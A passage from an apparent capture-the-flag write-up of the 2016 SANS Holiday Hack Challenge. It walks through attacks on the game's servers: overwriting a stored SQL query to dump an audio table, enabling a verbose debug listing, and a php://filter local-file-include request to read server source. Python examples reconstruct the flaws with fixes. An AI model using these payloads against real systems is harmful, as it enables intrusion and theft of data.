      &lt;span class=&quot;s2&quot;&gt;&quot;SET &quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$set&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;', '&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;' '&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt;
      &lt;span class=&quot;s2&quot;&gt;&quot;WHERE `id`='&quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;mysqli_real_escape_string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$db&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_REQUEST&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'id'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;'&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;htmlentities&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;

    &lt;span class=&quot;nv&quot;&gt;$result&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;mysqli_query&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$db&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
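&lt;p&gt;The same flaw re-created in Python against an in-memory SQLite table, with the allowlisted fix alongside it (an added example, not the challenge’s own code; the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;reports&lt;/code&gt; table layout, the sample request and the SQLite-for-MySQL substitution are assumptions). Note that the original escaped every value, so the defect is not injection: it is that any column of the looked-up row, including the stored SQL, can be overwritten by a request parameter of the same name.&lt;/p&gt;

```python
"""The edit.php column-walking flaw from the analytics server, re-created in
Python against an in-memory SQLite table.  Added example for this writeup,
not the challenge's own code; the reports table layout, the sample request
and the use of SQLite in place of MySQL are assumptions."""
import sqlite3

# Columns the edit form is actually meant to change.
EDITABLE_COLUMNS = ("name", "description")

ORIGINAL_QUERY = "SELECT id, username FROM app_launch_reports"  # constructed
TAMPERED_REQUEST = {  # constructed: the form itself only sends id/name/description
    "id": "report-1",
    "name": "launches (renamed)",
    "query": "SELECT id,username,filename,TO_BASE64(mp3) FROM audio",
}


def make_db():
    """Fresh in-memory database holding one saved report."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute('CREATE TABLE reports ("id" TEXT PRIMARY KEY, "name" TEXT, '
               '"description" TEXT, "query" TEXT)')
    db.execute("INSERT INTO reports VALUES (?, ?, ?, ?)",
               ("report-1", "launches", "app launch events", ORIGINAL_QUERY))
    db.commit()
    return db


def _apply_update(db, report_id, assignments):
    """Build and run the UPDATE.  Column names come from the schema, never
    from the request, and values are bound; this mirrors the original's
    (correct) escaping of values and is not where the bug lives."""
    if not assignments:
        return False
    set_clause = ", ".join('"%s" = ?' % col for col, _ in assignments)
    params = [value for _, value in assignments] + [report_id]
    db.execute('UPDATE reports SET %s WHERE "id" = ?' % set_clause, params)
    db.commit()
    return True


def update_report_vulnerable(db, request):
    """Mirrors edit.php: every column of the existing row is a candidate, so
    a parameter named 'query' silently rewrites the stored SQL."""
    row = db.execute('SELECT * FROM reports WHERE "id" = ?',
                     (request["id"],)).fetchone()
    if row is None:
        return False
    assignments = [(col, request[col]) for col in row.keys() if col in request]
    return _apply_update(db, request["id"], assignments)


def update_report_hardened(db, request):
    """Fix: an explicit allowlist of editable columns.  Extra parameters are
    ignored here; a stricter variant would reject the request outright."""
    assignments = [(col, request[col]) for col in EDITABLE_COLUMNS
                   if col in request]
    return _apply_update(db, request["id"], assignments)


def fetch_report(db, report_id):
    """Return the stored row as a plain dict for inspection."""
    row = db.execute('SELECT * FROM reports WHERE "id" = ?',
                     (report_id,)).fetchone()
    return dict(row) if row is not None else None


if __name__ == "__main__":
    db = make_db()
    update_report_vulnerable(db, TAMPERED_REQUEST)
    print("vulnerable:", fetch_report(db, "report-1")["query"])
    db = make_db()
    update_report_hardened(db, TAMPERED_REQUEST)
    print("hardened:  ", fetch_report(db, "report-1")["query"])
```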

&lt;p&gt;Thus by examining the schema, specifically the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;audio&lt;/code&gt; table which holds the MP3 metadata and blobs, we are able to modify a saved query with SQL constructed such that it will divulge the contents of the table in an HTML-friendly format (base64 encoding the MP3 blob using MySQL’s handy &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TO_BASE64&lt;/code&gt; builtin function):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;SELECT id,username,filename,TO_BASE64(mp3) FROM audio;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;which gives us&lt;/p&gt;

&lt;table&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;id&lt;/code&gt;&lt;/th&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;username&lt;/code&gt;&lt;/th&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;filename&lt;/code&gt;&lt;/th&gt;
      &lt;th style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mp3&lt;/code&gt;&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;20c216bc-b8b1-11e6-89e1-42010af00008&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;guest&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio2.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;em&gt;omitted&lt;/em&gt;&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;3746d987-b8b1-11e6-89e1-42010af00008&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;administrator&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio7.mp3&lt;/code&gt;&lt;/td&gt;
      &lt;td style=&quot;text-align: left&quot;&gt;&lt;em&gt;omitted&lt;/em&gt;&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;We can then take the base64 encoding of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio7.mp3&lt;/code&gt; file (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;313e7e370fd7d5232bb569f21856d9f4&lt;/code&gt;) and recover the audio file for later analysis.&lt;/p&gt;

&lt;h3 id=&quot;the-dungeon-game&quot;&gt;The Dungeon Game&lt;/h3&gt;
&lt;p&gt;Whilst conducting our adventure in the quest world, we are told by various NPCs about a game called “Dungeon” which is played by Pepper Mintstix, who provides us with a link (http://www.northpolewonderland.com/dungeon.zip) to an old copy of the game. Downloading and extracting this yields an ELF 64-bit executable called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dungeon&lt;/code&gt; as well as what turns out to be an encrypted assets file called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dtextc.dat&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Executing the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dungeon&lt;/code&gt; file in an isolated VM indeed drops us into a game of &lt;a href=&quot;https://en.wikipedia.com/wiki/Zork&quot;&gt;dungeon, otherwise known as Zork&lt;/a&gt;, one of the earliest interactive fiction computer games.&lt;/p&gt;

&lt;p&gt;Playing the game through to completion seems like it could waste a considerable amount of time, so let’s consider alternative approaches to beating it.&lt;/p&gt;

&lt;p&gt;My first port of call was to download and compile &lt;a href=&quot;http://web.mit.edu/jhawk/src/cdungeon-decode.c&quot;&gt;a tool&lt;/a&gt; for decrypting the resources file. Perusing the decrypted resources shows that even if we are able to beat the local copy of the game by getting to the room containing the elf and presenting him with an item, he will tell us that we have to complete the online version - presumably located somewhere on &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dungeon.northpolewonderland.com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Port scanning this host shows an unusual open port listening on TCP/11111, and sure enough, by connecting to this socket with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netcat&lt;/code&gt; we see what looks like a hosted, interactive service running a copy of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dungeon&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Since we will be unable to access the hosted &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dtextc.dat&lt;/code&gt; file in which our desired information presumably lies, we will have to figure out how to complete the game purely by interacting with it. Fortunately, research turns up a hidden interactive debugger called GDT that is built into some versions of the game, and which is indeed present in both the downloaded and the hosted version; we are able to use it to cheat and reach the completion scenario with ease. We therefore connect to the hosted game and use the correct incantations to get the information we need, shown below:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ nc 35.184.47.139 11111            
Welcome to Dungeon.                     This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
&amp;gt;GDT
GDT&amp;gt;TK
Entry:    154
Taken.
GDT&amp;gt;AH
Old=      2      New= 192
GDT&amp;gt;exit
&amp;gt;look
You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa's elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
                Songs of the seasons are in many parts
                To solve a puzzle is in our hearts
                Ask not what what the answer be,
                Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.
&amp;gt;inventory
You are carrying:
  A jewel-encrusted egg.
&amp;gt;give elf egg
The elf, satisified with the trade says -
send email to &quot;peppermint@northpolewonderland.com&quot; for that which you seek.
The elf says - you have conquered this challenge - the game will now end.
Your score is 5 [total of 585 points], in 5 moves.
This gives you the rank of Beginner.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Following the instructions and sending an e-mail to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;peppermint@northpolewonderland.com&lt;/code&gt; we receive a prompt reply with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio3.mp3&lt;/code&gt; file (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0be15d00299af1a6bc1d11ab6f2696a0&lt;/code&gt;) attached.&lt;/p&gt;

&lt;h3 id=&quot;the-debug-server&quot;&gt;The Debug Server&lt;/h3&gt;
&lt;p&gt;From examining the SantaGram Android application’s string resources, we see from the following lines that the debug server endpoint is located at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev.northpolewonderland.com&lt;/code&gt; and, more interestingly, that debug data collection is disabled by default, which would explain why we didn’t see any traffic to this endpoint whilst exercising the app as-is.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-xml&quot; data-lang=&quot;xml&quot;&gt;    &lt;span class=&quot;nt&quot;&gt;&amp;lt;string&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;name=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;debug_data_collection_url&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;http://dev.northpolewonderland.com/index.php&lt;span class=&quot;nt&quot;&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;string&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;name=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;debug_data_enabled&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;false&lt;span class=&quot;nt&quot;&gt;&amp;lt;/string&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;By changing this value to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;true&lt;/code&gt;, re-assembling the Android application and signing it with our own key, we are able to load the modified version of the application into our emulator. Grepping the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;smali&lt;/code&gt; for the string &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;debug&lt;/code&gt; suggests that the debug-reporting behaviour should be triggered by visiting the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;EditProfile&lt;/code&gt; activity. Doing so causes the following HTTP request to be made (JSON formatting mine throughout):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    &quot;date&quot;: &quot;20161218140911-0500&quot;,
    &quot;freemem&quot;: -1,
    &quot;debug&quot;: &quot;com.northpolewonderland.santagram.EditProfile, EditProfile&quot;,
    &quot;udid&quot;: &quot;91104f4f660a1469&quot;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;with response as follows:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:01 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 244

{
    &quot;date&quot;: &quot;20161219003601&quot;,
    &quot;status&quot;: &quot;OK&quot;,
    &quot;filename&quot;: &quot;debug-20161219003601-0.txt&quot;,
    &quot;request&quot;: {
        &quot;date&quot;: &quot;20161218140911-0500&quot;,
        &quot;freemem&quot;: -1,
        &quot;debug&quot;: &quot;com.northpolewonderland.santagram.EditProfile, EditProfile&quot;,
        &quot;udid&quot;: &quot;91104f4f660a1469&quot;,
        &quot;verbose&quot;: false
    }
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We see that the request payload is reflected back to us in the response, but that it includes an extra parameter we did not specify, named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;verbose&lt;/code&gt;. By crafting our own request to include this parameter with its value set to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;true&lt;/code&gt;, the server responds with a list of the reports that it has (which appear to be cleared out periodically, judging by the way the list changes over time):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    &quot;date&quot;: &quot;20161218140911-0500&quot;,
    &quot;freemem&quot;: -1,
    &quot;debug&quot;: &quot;com.northpolewonderland.santagram.EditProfile, EditProfile&quot;,
    &quot;udid&quot;: &quot;91104f4f660a1469&quot;,
    &quot;verbose&quot;: true
}    

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:21 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 691

{
    &quot;date&quot;: &quot;20161219003621&quot;,
    &quot;date.len&quot;: 14,
    &quot;status&quot;: &quot;OK&quot;,
    &quot;status.len&quot;: &quot;2&quot;,
    &quot;filename&quot;: &quot;debug-20161219003621-0.txt&quot;,
    &quot;filename.len&quot;: 26,
    &quot;request&quot;: {
        &quot;date&quot;: &quot;20161218140911-0500&quot;,
        &quot;freemem&quot;: -1,
        &quot;debug&quot;: &quot;com.northpolewonderland.santagram.EditProfile, EditProfile&quot;,
        &quot;udid&quot;: &quot;91104f4f660a1469&quot;,
        &quot;verbose&quot;: true
    },
    &quot;files&quot;: [
        &quot;debug-20161219002320-0.txt&quot;,
        &quot;debug-20161219002349-0.txt&quot;,
        &quot;debug-20161219002443-0.txt&quot;,
        &quot;debug-20161219002507-0.txt&quot;,
        &quot;debug-20161219002552-0.txt&quot;,
        &quot;debug-20161219002648-0.txt&quot;,
        &quot;debug-20161219003121-0.txt&quot;,
        &quot;debug-20161219003452-0.txt&quot;,
        &quot;debug-20161219003559-0.txt&quot;,
        &quot;debug-20161219003601-0.txt&quot;,
        &quot;debug-20161219003617-0.txt&quot;,
        &quot;debug-20161219003621-0.txt&quot;,
        &quot;debug-20161224235959-0.mp3&quot;,
        &quot;index.php&quot;
    ]
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Notice &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;debug-20161224235959-0.mp3&lt;/code&gt; - this must be another discombobulated audio file! Surely enough, we can download this simply by making a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;GET&lt;/code&gt; request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://dev.northpolewonderland.com/debug-20161224235959-0.mp3&lt;/code&gt; (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0a5ef5d7a0e89658a833d1892a9e1ec6&lt;/code&gt;).&lt;/p&gt;

&lt;h3 id=&quot;the-banner-ad-server&quot;&gt;The Banner Ad Server&lt;/h3&gt;
&lt;p&gt;This endpoint, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://ads.northpolewonderland.com&lt;/code&gt;, is used to serve up advertisements within the SantaGram Android application. Visiting the site in a browser (with our ad-blocker disabled, as it seems to interfere with the site) reveals a web application built using the &lt;a href=&quot;https://www.meteor.com/&quot;&gt;Meteor framework&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Using the information available on Ed Skoudis’s SANS blog post, &lt;a href=&quot;https://pen-testing.sans.org/blog/2016/12/06/mining-meteor&quot;&gt;Mining Meteor&lt;/a&gt;, we can use the &lt;a href=&quot;https://tampermonkey.net/&quot;&gt;TamperMonkey&lt;/a&gt; script &lt;a href=&quot;https://github.com/nidem/MeteorMiner&quot;&gt;MeteorMiner&lt;/a&gt; to inspect the routes available in the web application. Navigating to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/admin/quotes&lt;/code&gt; route, we notice a subscription to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;adminQuotes&lt;/code&gt; publication, which contains amongst its collections an entry with a property called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;audio&lt;/code&gt; and value &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3&lt;/code&gt;. Fetching this resource from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3&lt;/code&gt; gives us another audio file (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;3d87c1d31717f81f1966db4133f9e24d&lt;/code&gt;).&lt;/p&gt;

&lt;h3 id=&quot;the-uncaught-exception-handler-server&quot;&gt;The Uncaught Exception Handler Server&lt;/h3&gt;
&lt;p&gt;Looking at the request (truncated for brevity) and response which are sent and received when the Android application reports an unhandled exception, we see the following:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST http://ex.northpolewonderland.com/exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; ONE A2003 Build/MMB29M)
Connection: Keep-Alive
Content-Length: 1269
Host: ex.northpolewonderland.com

{
    &quot;operation&quot;: &quot;WriteCrashDump&quot;,
    &quot;data&quot;: {
        &quot;message&quot;: &quot;Invalid index 0, size is 0&quot;,
        ...
    }
}
 
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 15 Dec 2016 15:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

{
	&quot;success&quot; : true,
	&quot;folder&quot; : &quot;docs&quot;,
	&quot;crashdump&quot; : &quot;crashdump-Ez9xc2.php&quot;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;From here, we can fuzz the request payload and examine the server’s response to try to build a mental model of the functionality supported by this endpoint:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ curl http://ex.northpolewonderland.com/exception.php \
    -d '{}'
Content type must be: application/json

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{}'
Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{&quot;operation&quot;:&quot;ReadCrashDump&quot;}'
Fatal error! JSON key 'data' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{&quot;operation&quot;:&quot;ReadCrashDump&quot;, &quot;data&quot;: {}}'
Fatal error! JSON key 'crashdump' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{&quot;operation&quot;:&quot;ReadCrashDump&quot;, &quot;data&quot;: {&quot;crashdump&quot;:&quot;crashdump-Ez9xc2.php&quot;}}'
Fatal error! crashdump value duplicate '.php' extension detected.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{&quot;operation&quot;:&quot;ReadCrashDump&quot;, &quot;data&quot;: {&quot;crashdump&quot;:&quot;crashdump-Ez9xc2&quot;}}'
&amp;lt;&amp;lt;response body contains what we submitted in the dump data&amp;gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
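&lt;p&gt;The fuzzing above maps the endpoint’s key checks but also shows that, beyond refusing a trailing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.php&lt;/code&gt;, the crashdump name itself is never validated. The following is an added example (not the challenge’s code, and written in Python rather than the server’s PHP) of the allowlist and path-containment check a ReadCrashDump handler should apply before any file access. It assumes the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/www/html/docs/&lt;/code&gt; directory and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crashdump-XXXXXX&lt;/code&gt; naming visible in the leaked source later in this writeup, and its constructed inputs include the php://filter wrapper that the writeup goes on to use.&lt;/p&gt;

```python
import json
import posixpath
import re

# Added example for the exception.php endpoint described above; this is not
# the challenge's own code. It shows the server-side validation a
# ReadCrashDump handler needs before it touches the filesystem. Assumed
# layout, taken from the leaked source: dumps live under BASEPATH and are
# named "crashdump-" plus the six-character suffix tempnam() appends, with
# ".php" added by the server, never by the client.

BASEPATH = "/var/www/html/docs/"

# Exact shape of the names the server itself generates. Anything else
# (stream wrappers such as php://filter/..., path separators, dots, an
# explicit extension) is refused before any I/O happens.
CRASHDUMP_NAME = re.compile(r"^crashdump-[A-Za-z0-9]{6}$")


def resolve_crashdump(requested, basepath=BASEPATH):
    """Map a client-supplied crashdump name to an on-disk path.

    Returns (path, None) when the name is acceptable, or (None, reason)
    explaining the refusal. The duplicate-extension reason reuses the
    endpoint's own wording so existing log parsing keeps working.
    """
    if not isinstance(requested, str):
        return None, "crashdump value must be a string"
    if requested.lower().endswith(".php"):
        # The endpoint already refuses this; keep it, but do not rely on it alone.
        return None, "crashdump value duplicate '.php' extension detected"
    if "://" in requested:
        # A scheme means a wrapper request, not a file name; log it distinctly
        # so a php://filter probe stands out in the access log.
        return None, "stream wrapper in crashdump value"
    if not CRASHDUMP_NAME.fullmatch(requested):
        return None, "crashdump value is not a server-generated dump name"
    path = posixpath.normpath(posixpath.join(basepath, requested + ".php"))
    # Defence in depth: even a name that passed the allowlist must still
    # resolve inside the dump directory.
    if not path.startswith(basepath):
        return None, "resolved path escapes the crash dump directory"
    return path, None


def triage_request(raw_body):
    """Apply the endpoint's key checks, then validate the dump name.

    Returns a one-line verdict suitable for an access log.
    """
    try:
        obj = json.loads(raw_body)
    except ValueError:
        return "refused: POST contains invalid JSON!"
    if not isinstance(obj, dict):
        return "refused: POST contains invalid JSON!"
    operation = obj.get("operation")
    if operation not in ("WriteCrashDump", "ReadCrashDump"):
        return ("refused: JSON key 'operation' must be set to "
                "WriteCrashDump or ReadCrashDump.")
    data = obj.get("data")
    if not isinstance(data, dict):
        return "refused: JSON key 'data' must be set."
    if operation == "WriteCrashDump":
        return "accepted: WriteCrashDump"
    if "crashdump" not in data:
        return "refused: JSON key 'crashdump' must be set."
    path, reason = resolve_crashdump(data["crashdump"])
    if path is None:
        return "refused: " + reason
    return "accepted: read " + path


# Constructed request bodies, modelled on the ones sent during the fuzzing
# session above (not captured traffic).
SAMPLE_BODIES = [
    '{}',
    '{"operation":"ReadCrashDump"}',
    '{"operation":"ReadCrashDump", "data": {}}',
    '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2.php"}}',
    '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2"}}',
    '{"operation":"ReadCrashDump", "data": {"crashdump":'
    '"php://filter/convert.base64-encode/resource=exception"}}',
    '{"operation":"ReadCrashDump", "data": {"crashdump":"../exception"}}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(triage_request(body))
```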

&lt;p&gt;At this point, we can start to think about what vulnerabilities might exist. As per the hints from Sugarplum Mary in the quest world, we could think about PHP I/O streams as a potential vector. Using another SANS blog post, &lt;a href=&quot;https://pen-testing.sans.org/blog/2016/12/07/getting-moar-value-out-of-php-local-file-include-vulnerabilities&quot;&gt;Getting MOAR Value out of PHP Local File Include Vulnerabilities&lt;/a&gt; by Ed Skoudis, we can use the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ReadCrashDump&lt;/code&gt; functionality to read the source for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;exception.php&lt;/code&gt; (with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.php&lt;/code&gt; extension being automatically appended by the code on the remote end) by passing a PHP stream filter as the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;crashdump&lt;/code&gt; argument:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{&quot;operation&quot;:&quot;ReadCrashDump&quot;, &quot;data&quot;: {&quot;crashdump&quot;:&quot;php://filter/convert.base64-encode/resource=exception&quot;}}'
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Base64 decoding the output from this gives us the source for the webpage:&lt;/p&gt;

